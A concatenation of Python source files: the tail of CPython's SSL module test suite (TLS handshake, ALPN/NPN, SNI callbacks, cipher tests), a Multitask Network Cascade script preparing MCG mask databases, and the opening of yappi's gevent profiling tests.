"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
data = b"data"
# read(-1, buffer) is supported, even though read(-1) is not
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# recv/read(0) should return no data
s.send(data)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), "TLSv1")
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers("RC4")
server_context.set_ciphers("AES:RC4")
stats = server_params_test(client_context, server_context)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
self.assertIn("RC4", name.split("-"))
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
'dist\(\) and linux_distribution\(\) '
'functions are deprecated .*',
PendingDeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SimpleBackgroundTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
prepare_mcg_maskdb.py | # --------------------------------------------------------
# Multitask Network Cascade
# Written by Haozhi Qi
# Copyright (c) 2016, Haozhi Qi
# Licensed under The MIT License [see LICENSE for details]
# --------------------------------------------------------
# System modules
import argparse
import os
import cPickle
import numpy as np
import scipy.io as sio
import cv2
from multiprocessing import Process
import time
import PIL
# User-defined module
import _init_paths
from mnc_config import cfg
from utils.cython_bbox import bbox_overlaps
from transform.mask_transform import mask_overlap, intersect_mask
from datasets.pascal_voc_seg import PascalVOCSeg
def parse_args():
""" Parse input arguments
"""
parser = argparse.ArgumentParser(description='Prepare MCG roidb')
parser.add_argument('--input', dest='input_dir',
help='folder contain input mcg proposals',
default='data/MCG-raw/', type=str)
parser.add_argument('--output', dest='output_dir',
help='folder contain output roidb', required=True,
type=str)
parser.add_argument('--gt_roi', dest='roidb', help='roidb',
default='data/cache/voc_2012_train_gt_roidb.pkl', type=str)
parser.add_argument('--gt_mask', dest='maskdb', help='maskdb',
default='data/cache/voc_2012_train_gt_maskdb.pkl', type=str)
parser.add_argument('-mask_sz', dest='mask_size',
help='compressed mask resolution',
default=21, type=int)
parser.add_argument('--top_k', dest='top_k',
help='number of generated proposal',
default=-1, type=int)
parser.add_argument('--db', dest='db_name',
help='train or validation',
default='train', type=str)
parser.add_argument('--para_job', dest='para_job',
help='launch several process',
default='1', type=int)
return parser.parse_args()
def process_roidb(file_start, file_end, db):
for cnt in xrange(file_start, file_end):
f = file_list[cnt]
full_file = os.path.join(input_dir, f)
output_cache = os.path.join(output_dir, f.split('.')[0] + '.mat')
timer_tic = time.time()
if os.path.exists(output_cache):
continue
mcg_mat = sio.loadmat(full_file)
mcg_mask_label = mcg_mat['labels']
mcg_superpixels = mcg_mat['superpixels']
num_proposal = len(mcg_mask_label)
mcg_boxes = np.zeros((num_proposal, 4))
mcg_masks = np.zeros((num_proposal, mask_size, mask_size), dtype=np.bool)
for ind_proposal in xrange(num_proposal):
label = mcg_mask_label[ind_proposal][0][0]
proposal = np.in1d(mcg_superpixels, label).reshape(mcg_superpixels.shape)
[r, c] = np.where(proposal == 1)
y1 = np.min(r)
x1 = np.min(c)
y2 = np.max(r)
x2 = np.max(c)
box = np.array([x1, y1, x2, y2])
proposal = proposal[y1:y2+1, x1:x2+1]
proposal = cv2.resize(proposal.astype(np.float), (mask_size, mask_size), interpolation=cv2.INTER_NEAREST)
mcg_masks[ind_proposal, :, :] = proposal
mcg_boxes[ind_proposal, :] = box
if top_k != -1:
mcg_boxes = mcg_boxes[:top_k, :]
mcg_masks = mcg_masks[:top_k, :]
if db == 'val':
# if we prepare validation data, we only need its masks and boxes
roidb = {
'masks': (mcg_masks >= cfg.BINARIZE_THRESH).astype(bool),
'boxes': mcg_boxes
}
sio.savemat(output_cache, roidb)
use_time = time.time() - timer_tic
print '%d/%d use time %f' % (cnt, len(file_list), use_time)
else:
# Otherwise we need to prepare other information like overlaps
num_mcg = mcg_boxes.shape[0]
gt_roidb = gt_roidbs[cnt]
gt_maskdb = gt_maskdbs[cnt]
gt_boxes = gt_roidb['boxes']
gt_masks = gt_maskdb['gt_masks']
gt_classes = gt_roidb['gt_classes']
num_gt = gt_boxes.shape[0]
num_all = num_gt + num_mcg
# define output structure
det_overlaps = np.zeros((num_all, 1))
seg_overlaps = np.zeros((num_all, 1))
seg_assignment = np.zeros((num_all, 1))
mask_targets = np.zeros((num_all, mask_size, mask_size))
# ------------------------------------------------------
all_boxes = np.vstack((gt_boxes[:, :4], mcg_boxes)).astype(int)
all_masks = np.zeros((num_all, mask_size, mask_size))
for i in xrange(num_gt):
all_masks[i, :, :] = (cv2.resize(gt_masks[i].astype(np.float),
(mask_size, mask_size)))
assert all_masks[num_gt:, :, :].shape == mcg_masks.shape
all_masks[num_gt:, :, :] = mcg_masks
# record bounding box overlaps
cur_overlap = bbox_overlaps(all_boxes.astype(np.float), gt_boxes.astype(np.float))
seg_assignment = cur_overlap.argmax(axis=1)
det_overlaps = cur_overlap.max(axis=1)
seg_assignment[det_overlaps == 0] = -1
# record mask region overlaps
seg_overlaps[:num_gt] = 1.0
for i in xrange(num_gt, num_all):
cur_mask = cv2.resize(all_masks[i, :, :].astype(np.float),
(all_boxes[i, 2] - all_boxes[i, 0] + 1,
all_boxes[i, 3] - all_boxes[i, 1] + 1)) >= cfg.BINARIZE_THRESH
for mask_ind in xrange(len(gt_masks)):
gt_mask = gt_masks[mask_ind]
gt_roi = gt_roidb['boxes'][mask_ind]
cur_ov = mask_overlap(all_boxes[i, :], gt_roi, cur_mask, gt_mask)
seg_overlaps[i] = max(seg_overlaps[i], cur_ov)
output_label = np.zeros((num_all, 1))
for i in xrange(num_all):
if seg_assignment[i] == -1:
continue
cur_ind = seg_assignment[i]
output_label[i] = gt_classes[seg_assignment[i]]
mask_targets[i, :, :] = intersect_mask(all_boxes[i, :], gt_roidb['boxes'][cur_ind], gt_masks[cur_ind])
# Some of the array need to insert a new axis to be consistent of savemat method
roidb = {
'masks': (all_masks >= cfg.BINARIZE_THRESH).astype(bool),
'boxes': all_boxes,
'det_overlap': det_overlaps[:, np.newaxis],
'seg_overlap': seg_overlaps,
'mask_targets': (mask_targets >= cfg.BINARIZE_THRESH).astype(bool),
'gt_classes': gt_classes[:, np.newaxis],
'output_label': output_label,
'gt_assignment': seg_assignment[:, np.newaxis],
'Flip': False
}
sio.savemat(output_cache, roidb)
use_time = time.time() - timer_tic
print '%d/%d use time %f' % (cnt, len(file_list), use_time)
def process_flip_masks(image_names, im_start, im_end):
widths = [PIL.Image.open('data/VOCdevkitSDS/img/' + im_name + '.jpg').size[0] for im_name in image_names]
cache_dir = output_dir
if not os.path.isdir(cache_dir):
os.makedirs(cache_dir)
for index in xrange(im_start, im_end):
output_cache = os.path.join(cache_dir, image_names[index] + '_flip.mat')
if os.path.exists(output_cache):
continue
image_cache = os.path.join(cache_dir, image_names[index] + '.mat')
orig_maskdb = sio.loadmat(image_cache)
# Flip mask and mask regression targets
masks = orig_maskdb['masks']
mask_targets = orig_maskdb['mask_targets']
mask_flip = masks[:, :, ::-1]
mask_target_flip = mask_targets[:, :, ::-1]
# Flip boxes
boxes = orig_maskdb['boxes']
oldx1 = boxes[:, 0].copy()
oldx2 = boxes[:, 2].copy()
boxes[:, 0] = widths[index] - oldx2 - 1
boxes[:, 2] = widths[index] - oldx1 - 1
assert (boxes[:, 2] >= boxes[:, 0]).all()
# Other maskdb values are identical with original maskdb
flip_maskdb = {
'masks': (mask_flip >= cfg.BINARIZE_THRESH).astype(bool),
'boxes': boxes,
'det_overlap': orig_maskdb['det_overlap'],
'seg_overlap': orig_maskdb['seg_overlap'],
'mask_targets': (mask_target_flip >= cfg.BINARIZE_THRESH).astype(bool),
'gt_classes': orig_maskdb['gt_classes'],
'gt_assignment': orig_maskdb['gt_assignment'],
'Flip': True,
'output_label': orig_maskdb['output_label']
}
sio.savemat(output_cache, flip_maskdb)
if __name__ == '__main__':
args = parse_args()
input_dir = args.input_dir
assert os.path.exists(input_dir), 'Path does not exist: {}'.format(input_dir)
output_dir = args.output_dir
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
mask_size = args.mask_size
list_name = 'data/VOCdevkitSDS/train.txt' if args.db_name == 'train' else 'data/VOCdevkitSDS/val.txt'
with open(list_name) as f:
file_list = f.read().splitlines()
# If we want to prepare training maskdb, first try to load gts
if args.db_name == 'train':
if os.path.exists(args.roidb) and os.path.exists(args.maskdb):
with open(args.roidb, 'rb') as f:
gt_roidbs = cPickle.load(f)
with open(args.maskdb, 'rb') as f:
gt_maskdbs = cPickle.load(f)
else:
db = PascalVOCSeg('train', '2012', 'data/VOCdevkitSDS/')
gt_roidbs = db.gt_roidb()
gt_maskdbs = db.gt_maskdb()
top_k = args.top_k
num_process = args.para_job
# Prepare train/val maskdb use multi-process
processes = []
file_start = 0
file_offset = int(np.ceil(len(file_list) / float(num_process)))
for process_id in xrange(num_process):
file_end = min(file_start + file_offset, len(file_list))
p = Process(target=process_roidb, args=(file_start, file_end, args.db_name))
p.start()
processes.append(p)
file_start += file_offset
for p in processes:
p.join()
# If db_name == 'train', we still need to add flipped maskdb into output folder
# Add flipped mask and mask regression targets after prepare the original mcg proposals
if args.db_name == 'train':
print 'Appending flipped MCG to ROI'
processes = []
file_start = 0
file_offset = int(np.ceil(len(file_list) / float(num_process)))
for process_id in xrange(num_process):
file_end = min(file_start + file_offset, len(file_list))
p = Process(target=process_flip_masks, args=(file_list, file_start, file_end))
p.start()
processes.append(p)
file_start += file_offset
for p in processes:
p.join()
|
test_gevent.py | import unittest
import _yappi
import yappi
import gevent
from gevent.event import Event
import threading
from .utils import (
YappiUnitTestCase, find_stat_by_name, burn_cpu, burn_io,
burn_io_gevent
)
class GeventTestThread(threading.Thread):
def __init__(self, name, *args, **kwargs):
super(GeventTestThread, self).__init__(*args, **kwargs)
self.name = name
def run(self):
gevent.getcurrent().name = self.name
gevent.get_hub().name = "Hub"
super(GeventTestThread, self).run()
class GeventTest(YappiUnitTestCase):
def setUp(self):
super(GeventTest, self).setUp()
yappi.set_clock_type("cpu")
yappi.set_context_backend("greenlet")
yappi.set_context_name_callback(self.get_greenlet_name)
gevent.getcurrent().name = "Main"
gevent.get_hub().name = "Hub"
@classmethod
def get_greenlet_name(cls):
try:
return gevent.getcurrent().name
except AttributeError:
return None
@classmethod
def spawn_greenlet(cls, name, func, *args, **kwargs):
name = "%s/%s" % (cls.get_greenlet_name(), name)
gl = gevent.Greenlet(func, *args, **kwargs)
gl.name = name
gl.start()
return gl
@classmethod
def spawn_thread(cls, name, func, *args, **kwargs):
name = "%s/%s" % (cls.get_greenlet_name(), name)
t = GeventTestThread(name, target=func, args=args, kwargs=kwargs)
t.start()
return t
class TestAPI(GeventTest):
def test_start_flags(self):
self.assertEqual(_yappi._get_start_flags(), None)
yappi.start()
def a():
pass
a()
self.assertEqual(_yappi._get_start_flags()["profile_builtins"], 0)
self.assertEqual(_yappi._get_start_flags()["profile_multicontext"], 1)
self.assertEqual(len(yappi.get_greenlet_stats()), 1)
yappi.stop()
yappi.clear_stats()
yappi.start(builtins=True, profile_greenlets=True, profile_threads=False)
self.assertEqual(_yappi._get_start_flags()["profile_builtins"], 1)
self.assertEqual(_yappi._get_start_flags()["profile_multicontext"], 1)
self.assertEqual(len(yappi.get_greenlet_stats()), 1)
yappi.stop()
def test_context_change_exception(self):
yappi.start()
def a():
pass
a()
# Setting to same backend should succeed
# Changing backend should fail
self.assertRaises(_yappi.error, yappi.set_context_backend, "native_thread")
yappi.stop()
# Still fail, stats need to be cleared
self.assertRaises(_yappi.error, yappi.set_context_backend, "native_thread")
yappi.clear_stats()
# Should succeed now
yappi.set_context_backend("native_thread")
yappi.stop()
def test_get_context_stat_exception(self):
yappi.start()
def a():
pass
a()
yappi.stop()
self.assertRaises(yappi.YappiError, yappi.get_thread_stats)
self.assertEqual(len(yappi.get_greenlet_stats()), 1)
def test_context_cbks_reset_to_default(self):
yappi.set_context_backend("greenlet")
yappi.set_context_backend("native_thread")
class ThreadA(threading.Thread):
def run(self):
burn_cpu(0.05)
def a():
pass
yappi.start()
t = ThreadA()
t.start()
t.join()
# Spawn a greenlet to test that greenlet context is not recognised
g = gevent.Greenlet(a)
g.start()
g.get()
yappi.stop()
tstats = yappi.get_thread_stats()
self.assertEqual(len(tstats), 2, "Incorrect number of contexts captured")
# First stat should be of threadA since it is sorted by ttot
statsA = tstats[0]
self.assertEqual(statsA.tid, t.ident)
self.assertEqual(statsA.name, t.__class__.__name__)
statsMain = tstats[1]
main_thread = threading.current_thread()
self.assertEqual(statsMain.tid, main_thread.ident)
self.assertEqual(statsMain.name, main_thread.__class__.__name__)
class SingleThreadTests(GeventTest):
def test_recursive_greenlet(self):
def a(n):
if n <= 0:
return
burn_io_gevent(0.1)
burn_cpu(0.1)
